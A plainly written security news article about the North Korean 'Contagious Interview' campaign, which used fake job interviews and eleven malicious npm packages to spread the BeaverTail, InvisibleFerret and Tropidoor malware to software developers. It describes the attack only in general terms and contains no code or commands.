Hackers Target Developers Using Fake Job Interviews
North Korean hackers are spreading dangerous malware called BeaverTail. They use a sneaky trick — pretending to offer job interviews to software developers. This method is called the “Contagious Interview” campaign.
The hackers have now reached the npm ecosystem. Npm is a popular website where developers download code packages. These packages help them build software faster and easier. But some of the packages are fake. They look useful but contain hidden malware. When developers install them, their computers get infected.
The hackers made and uploaded 11 fake packages on npm. These looked like helpful tools for developers. Some had names like twitterapis, core-pino, and debugger-vite. People downloaded these packages over 5,600 times before they were removed. Once installed, the packages infected computers with malware. This malware could steal data, spy on users, and control systems from far away.
The attackers designed the attack to fool software developers during what looks like a job hiring process. They lure victims into opening these malicious packages by using interview-related names or code directories, like “eiwork_hire,” which hint at employment. This trick allows the hackers to silently break into the developer’s system.
Malicious Code Hides Behind Fake Tools
Hackers hide the 11 harmful npm packages as tools or debuggers. These looked like normal tools that programmers use. They linked some packages, like events-utils and icloud-cod, to Bitbucket. Bitbucket is a less popular code site than GitHub. This made the packages look more real. It also helped the hackers avoid quick detection.
Behind the scenes, these packages hide dangerous code. This code worked like a remote access trojan (RAT). A RAT lets hackers control infected computers from far away. The bad packages could download and run more code from the internet. They used a JavaScript function called eval() to do this.This method is risky and is often used by hackers.
Once the hackers gained access, they could do almost anything — steal sensitive files, download other malware, or even monitor the victim’s screen. The malware even included a secret Python-based backdoor tool called InvisibleFerret, which helps attackers maintain control over the device for a long time.
Some of the infected packages, such as cln-logger, node-clog, consolidate-log, and consolidate-logger, had slight differences in their code, showing that the hackers were trying out different versions of their malware to improve their success rate. This makes it harder for security systems to detect and block them.
Critical Vulnerabilities: The Dark Side of Pacemaker Technology
BeaverTail and Tropidoor: A New Malware Duo
Security researchers have seen the main malware, BeaverTail, before. But now, they found it spreading in new and smarter ways. This includes using npm packages. BeaverTail can steal information. It can also launch another harmful program called Tropidoor. Tropidoor is a new Windows backdoor. It has not been seen before. It gives hackers even more control over infected computers.
Recently, security experts in South Korea found a similar attack. In this case, hackers used a fake job interview to trick people again. They sent phishing messages with BeaverTail malware hidden inside. This attack mainly targeted developers in South Korea. The goal was to steal private data and financial information.
Some of the malicious servers used by the hackers are no longer active. But the infected code was made to fetch new data from those servers. This means the hackers could send any malware to infected computers at any time. That makes this threat very dangerous.
This new wave of attacks proves how skilled and determined these hackers are. By hiding malware in tools that developers trust and use every day, they are able to quietly invade software supply chains, one line of code at a time. This campaign shows that even a simple-looking package on npm could hide something sinister, especially when combined with clever tricks like fake job offers.
How Cyber Attacks on Industrial Control Systems Can Endanger Lives ?
